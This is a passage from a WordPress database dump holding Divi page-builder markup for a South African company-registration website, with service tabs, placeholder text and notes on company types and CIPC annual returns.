header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\" column_structure=\"1_5,1_5,1_5,1_5,1_5\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_style=\"wave\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" column_structure=\"1_2,1_2\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>A Proven Process Time &amp; Time Again</h2>\n<p>Vivamus suscipit tortor eget felis porttitor volutpat. Vivamus suscipit tortor eget felis porttitor volutpat. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Praesent sapien</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#1ca5ff\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" box_shadow_color=\"rgba(28,165,255,0.24)\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Project Request\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#3cd1ff\" background_color_gradient_end=\"#1ca5ff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset3\" box_shadow_vertical=\"45px\" box_shadow_blur=\"135px\" box_shadow_spread=\"-45px\" box_shadow_color=\"rgba(28,165,255,0.76)\" custom_margin=\"|6vw||6vw||true\" custom_padding=\"|30px||30px||true\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Already Know the Details of Your Project?</h2>\n<p>Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula.</p>[/et_pb_text][et_pb_button button_text=\"Online Project Application\" button_alignment=\"center\" _builder_version=\"3.19.6\" custom_button=\"on\" button_text_size=\"12px\" button_text_color=\"#ffffff\" button_bg_color=\"#000000\" button_border_width=\"0px\" button_border_radius=\"100px\" button_letter_spacing=\"1px\" button_font=\"Poppins|600||on|||||\" button_icon=\"%%190%%\" button_on_hover=\"off\" box_shadow_style=\"preset3\" box_shadow_vertical=\"30px\" box_shadow_blur=\"40px\" box_shadow_spread=\"-16px\" custom_padding=\"14px|58px|14px|40px|true|false\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Social\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|0|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_social_media_follow _builder_version=\"3.19.6\" border_radii=\"on|40px|40px|40px|40px\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.19.6\" background_color=\"#3b5998\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.19.6\" background_color=\"#00aced\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"instagram\" _builder_version=\"3.19.6\" background_color=\"#ea2c59\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]instagram[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"dribbble\" _builder_version=\"3.19.6\" background_color=\"#ea4c8d\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]dribbble[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"youtube\" _builder_version=\"3.19.6\" background_color=\"#a82400\" custom_margin=\"|9px||9px||true\" custom_padding=\"6px|6px|6px|6px|true|true\" follow_button=\"off\" url_new_window=\"on\"]youtube[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" admin_label=\"Call to Actions\" _builder_version=\"3.22\" locked=\"off\"][et_pb_fullwidth_header text_orientation=\"center\" button_one_text=\"Divi Marketplace\" button_two_text=\"Monarch Apps\" _builder_version=\"3.19.6\" title_font=\"||||||||\" subhead_font=\"||||||||\" background_color=\"#ffffff\" custom_button_one=\"on\" button_one_text_size=\"12px\" button_one_text_color=\"#ab5eff\" button_one_bg_color=\"#f0e8ff\" button_one_border_width=\"10px\" button_one_border_color=\"rgba(0,0,0,0)\" button_one_border_radius=\"100px\" button_one_letter_spacing=\"1px\" button_one_font=\"Poppins|600||on|||||\" button_one_icon=\"%%190%%\" button_one_on_hover=\"off\" custom_button_two=\"on\" button_two_text_size=\"12px\" button_two_text_color=\"#3fd3ce\" button_two_bg_color=\"#e0f9f9\" button_two_border_width=\"10px\" button_two_border_color=\"rgba(0,0,0,0)\" button_two_border_radius=\"100px\" button_two_letter_spacing=\"1px\" button_two_font=\"Poppins|600||on|||||\" button_two_icon=\"%%190%%\" button_two_on_hover=\"off\" custom_padding=\"0px||\"][/et_pb_fullwidth_header][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-13 10:46:58','2019-08-13 08:46:58','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(32807,3,'2019-08-15 14:58:35','2019-08-15 12:58:35','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>From (PTY) LTD to<br />Closed Corporations <br />We Do It All</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" 